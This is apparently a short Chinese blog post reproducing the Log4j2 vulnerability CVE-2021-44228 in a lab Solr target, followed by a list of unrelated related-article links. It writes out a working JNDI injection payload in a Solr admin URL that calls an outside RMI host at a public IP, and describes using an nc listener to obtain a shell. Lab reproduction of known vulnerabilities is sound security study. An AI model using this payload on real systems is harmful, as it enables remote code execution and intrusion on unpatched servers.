阿一网络安全之log4j2漏洞CVE-2021-44228复现

漏洞简介

Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

开启靶场


JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务


在 url 中插⼊构造的 payload
http://192.168.121.129:8983/solr/admin/cores? action=${jndi:rmi://116.62.17.187:1099/qdz3ly}
开启 nc 监听,成功 getshell

其实很简单,大家加油。

相关推荐
云水一下6 小时前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
MartinYeung58 小时前
[论文学习]SecureGate:通过令牌级门控学习何时安全地揭示PII-深度解析
学习·安全
广州市顺风搬家服务有限公司9 小时前
实验室搬迁科普专业流程防护标准与合规核心要点
网络·其他·安全
Xi-Xu10 小时前
什么时候需要 Multi-agent:不是分工,而是运行边界
人工智能·经验分享·安全
天真的银耳汤10 小时前
01 静态分析(Static Analysis)
log4j
2501_9437823512 小时前
【共创季稿事节】密码生成器:如何构建一个安全的随机密码生成工具
android·数据库·安全·鸿蒙·鸿蒙系统
轩渃12 小时前
Claude Fable5回归即翻车:跑分暴跌、安全拦截、账单猫腻,AI模型的信任危机
人工智能·安全·回归
Chockmans13 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
风控PM说15 小时前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
四月天431 天前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全